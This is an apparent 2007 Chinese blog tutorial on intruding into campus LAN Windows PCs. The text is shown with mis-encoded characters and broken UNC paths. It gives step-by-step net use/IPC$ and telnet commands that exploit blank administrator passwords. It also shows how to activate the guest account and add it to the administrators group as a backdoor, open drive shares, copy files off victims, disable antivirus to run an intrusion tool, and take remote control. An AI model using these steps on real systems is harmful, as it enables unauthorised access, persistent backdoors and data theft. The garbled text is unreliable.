來學(xué)校沒事,看了些局域網(wǎng)電腦入侵的資料,加上自己實(shí)戰(zhàn)經(jīng)驗(yàn)(絕對(duì)沒搞破壞,也沒上傳那些木馬,這是一點(diǎn)的道德問題),總結(jié)出兩種常用的入侵途徑:

1.用139端口(IPC$)入侵 (我不常用,好像很難成功)

一.

先用"NTscan變態(tài)掃描器"掃描局域網(wǎng)某一網(wǎng)段(我這里只要是校園網(wǎng)內(nèi)的就行)的IP,使用WMI掃描,端口139,得到一些弱口令(用戶名為administrator,密碼為空)的IP,使用cmd.exe,用net use IPIPC$ "" /user:administrator,但是絕大部分電腦都提示說:"發(fā)生系統(tǒng)錯(cuò)誤 53。(wWW.niUbB.Net）找不到網(wǎng)絡(luò)路徑。"我想可能是被對(duì)方防火墻攔截了.只有極個(gè)別能連上.

net use 218.168.0.1IPC$ "" /user:administrator 提示“命令成功完成”,建立好了IPC$(遠(yuǎn)程管理連接) 二.

net time 192.168.0.1 顯示遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間,顯示時(shí)間為05:00

at 192.168.0.1 05:00 telnet 用at命令啟動(dòng)遠(yuǎn)程主機(jī)的telnet服務(wù),但我用了可是沒成功(也可用我得電腦-管理-連接到另一臺(tái)計(jì)算機(jī)-輸入IP-服務(wù)和應(yīng)用程序-服務(wù)-將telnet改為手動(dòng)-啟動(dòng),就OK了)

telnet 192.168.0.1 telnet上去

administrator 鍵入y后,輸入的用戶名,密碼為空

三.

net user 查看用戶,如:administrator,guest, HelpAssistant

net user guest /active:yes 激活guest用戶

net user guest *** 更改guest的密碼為***

net localgroup administrators guest /add 把guest的權(quán)限提升為管理員權(quán)限,為以后入侵留后門 四.

net share admin$ net share E$ 開共享,默認(rèn)都是共享的

net share c$ /del 用來關(guān)閉共享的

net u** *192.168.0.1c$ "" /user:administrator 映射遠(yuǎn)程主機(jī)c$盤到本地x盤,這個(gè)我也沒成功 五

使用"遠(yuǎn)程監(jiān)控軟件dameware"控制這臺(tái)電腦.

六.

exit 斷開遠(yuǎn)程主機(jī)的連接(沒什么用,我都是直接關(guān)掉窗口的)

2.用23端口(telnet)入侵

一.(與上二大同)

先用"局域網(wǎng)查看工具V1.60"查看弱口令并開了23端口的,也可以只找到弱口令的主機(jī),然后每個(gè)IP都按照電腦-管理-連接到另一臺(tái)計(jì)算機(jī)-輸入IP-服務(wù)和應(yīng)用程序-服務(wù)-將telnet改為手動(dòng)-啟動(dòng)的方式開啟telnet,再在cmd.exe中輸入telnet IP,連不起的會(huì)出現(xiàn)"不能打開到主機(jī)的連接， 在端口 23: 連接失敗",當(dāng)然有些是開了23端口,但由于防火墻阻止了.

telnet 192.168.0.1 telent上去

administrator 輸入y后,輸入的用戶名,密碼為空

二.(同上三)

net user 查看用戶 :administrator,guest, HelpAssistant

net user guest /active:yes 激活guest用戶

net user guest **** 更改guest的密碼為****

net localgroup administrators guest /add 把guest的權(quán)限提升為管理員權(quán)限

三.

局域網(wǎng)入侵教程 局域網(wǎng)電腦入侵

net share ipc$ net share admin$ net share E$ 開共享,默認(rèn)都是共享的,ipc$一定要開,以便下一步net use 192.168.0.1IPC$ "" /user:administrator 建立IPC$(遠(yuǎn)程管理連接)

四.

使用"遠(yuǎn)程監(jiān)控軟件dameware"控制這臺(tái)電腦.

附:

1.共享信息

net share e=e: 將遠(yuǎn)程主機(jī)的E盤共享, 訪問時(shí)只需輸入192.168.136.e

net share c=c:winntsystem 共享system文件夾

net share e /del 關(guān)閉E盤共享

2.telnet命令(DOS命令),在網(wǎng)上搜,太多了

dir d: 查看D盤 dir d:PROGRA~1 即program file文件夾,取前6個(gè)字母加上~符號(hào),后面再加上數(shù)字1shutdown -s -t 60（60秒倒記時(shí)關(guān)機(jī)）opy復(fù)制文件 DEL刪除 MKDIR創(chuàng)建目錄 format格式化硬盤 IPCONFIG /ALL查看所有IP信息 NETSTAT -AN查看端口

3.ipc$常用命令,也在網(wǎng)上搜,也很多

copy c:x.exe 192.168.0.1c$ 即將c盤下的xinxin.exe復(fù)制到對(duì)方c盤內(nèi),這個(gè)我沒弄成功

copy 192.168.0.1c$x.exe c: 將遠(yuǎn)程主機(jī)上的文件復(fù)制到自己的機(jī)器里

4.軟件信息

一.遠(yuǎn)程開啟telent服務(wù)的軟件:"Recton--D賀免殺專用版",這個(gè)軟件很好用,只需要遠(yuǎn)程主機(jī)IP和用戶名密碼,就可開telent,只可惜要被我金山毒霸殺掉,每次用它都要將實(shí)時(shí)防毒關(guān)掉.

二."遠(yuǎn)程監(jiān)控軟件dameware",這個(gè)軟件很好,可以控制對(duì)方電腦就像在自己機(jī)子上操作一樣,十分方便,具體教程網(wǎng)上去找,美中不足的是,每次連接上遠(yuǎn)程主機(jī)后,它都要在對(duì)方電腦上彈出連接提示窗口,還發(fā)出"當(dāng)"的一聲,除非對(duì)方又聾又瞎,不然都會(huì)被發(fā)現(xiàn).(雖然我已把Additional Settings下的Enable SysTray Icon,和Notify Dialog下的Notify on Connection鉤掉了都這樣),所以著問題解決不了,這個(gè)軟件就不要輕易使用.

三.端口掃描軟件,這就太多了,網(wǎng)上一搜一大堆,也不曉得哪些好,我這里有"s掃描器","NTscan變態(tài)掃描器","流光5.0","hscan120掃描器"等

注:不要用來搞破壞哈.僅供娛樂!想上傳木馬的自己到網(wǎng)上找資料.

亂世狂人 2007.3.4

首發(fā)地址：http://user.qzone.***.com/164701150/blog/7